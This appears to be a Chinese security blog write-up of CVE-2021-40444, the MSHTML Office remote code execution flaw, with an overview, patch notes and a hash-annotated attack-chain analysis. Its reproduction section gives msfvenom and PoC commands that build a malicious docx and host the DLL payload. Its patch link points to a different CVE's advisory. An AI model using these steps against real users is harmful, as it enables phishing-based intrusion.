CVE-2021-40444:Microsoft MSHTML RCE

2022-03-31 10,183


上方蓝色字体关注我们,一起学安全!
作者:Pet3r@Timeline Sec
本文字数:1014
阅读时长:3~4min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负


0x01 简介


Microsoft报告了一个名为 CVE-2021-40444 的0day漏洞,利用该漏洞可以在受害者的计算机上远程执行恶意代码。黑客可在利用该漏洞攻击 Microsoft Office 用户拿下主机。


0x02 漏洞概述


编号:CVE-2021-40444

该漏洞存在于 Internet Explorer 引擎 MSHTML 中。尽管现在很少有人使用 IE(即使是 Microsoft 强烈建议改用其更新的浏览器 Edge),但旧浏览器仍然是现代操作系统的一个组件,其他一些程序使用其引擎来处理 Web 内容。特别是 Word 和 PowerPoint 等 Microsoft Office 应用程序依赖于它。


0x03 影响版本


包括Windows 7/8/8.1/10

Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本


0x04 漏洞复现


目标靶机office word开启开发工具



需要生成一个恶意的DLL文件,通过msf或者自身编译都行

1)自身编译:

image.png


编译:

i686-w64-mingw32-gcc -shared calc.c -o calc.dll


2)msf直接生成:

msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f dll>>calc.dll


下载POC代码,到Ubuntu测试服务器上:

https://github.com/lockedbyte/CVE-2021-40444


安装环境所需要的依赖

sudo apt-get install lcab

test/calc.dll (dll的绝对路径)


执行命令生成恶意word文档
python3 exploit.py generate test/calc.dll http://ip(启动exp机器的ip)



服务端启动HTTP服务

python3 exploit.py host 80



目标受害机打开生成的docx时



0x05 漏洞分析


攻击者可以在 Microsoft Office 文档中创建一个恶意的 ActiveX 控件,供 MSHTML 浏览器呈现引擎使用。在准备好嵌入在 MS Office 文档中的恶意 ActiveX 控件后,攻击者必须将恶意文档交付给用户。攻击者大多使用网络钓鱼 (MITRE ATT&CK T1566) 技术将恶意文档作为文档的附件或链接传送。之后,用户必须打开恶意文档才能触发漏洞利用。

例如:

1、当用户打开恶意文档(SHA-256:938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52),该.docx下载了一个.html文件(SHA-256:d0fd7acc38b3105facd6995344242f28e45f5384c0fdf2ec93ea24bfbc1dc9e6)
2、下载的 .HTML 文件中包含创建 ActiveX 控件窗口和混淆过的 JavaScript payload。然后,这些 ActiveX 控件去下载一个 .CAB 文件(SHA-256:1fb13a158aff3d258b8f62fe211fabeed03f0763b2acadbccad9e8e39969ea00)
3、CAB 是 Windows 中使用的存档文件格式。然后,payload从 .CAB 文件中提取 .DLL 文件(SHA-256:6eedf45cb91f6762de4e35e36bcb03e5ad60ce9ac5a08caeb7eda035cd74762b)并打开提取的文件
4、实际上,这个文件是一个命令执行或者CS的beacon

0x06 修复方式



https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36934


目前微软已经下发补丁,Microsoft Defender 防病毒和 Microsoft Defender for Endpoint 均提供检测和防范已知漏洞的功能,请及时更新检测版本。

参考链接:

https://github.com/lockedbyte/CVE-2021-40444

https://blog.csdn.net/weixin_44033675/article/details/120466121















本文作者:Timeline Sec

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/176007.html

Tags:
评论  (0)
快来写下你的想法吧!

Timeline Sec

文章数:38 积分: 190

欢迎关注公众号Timeline Sec

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号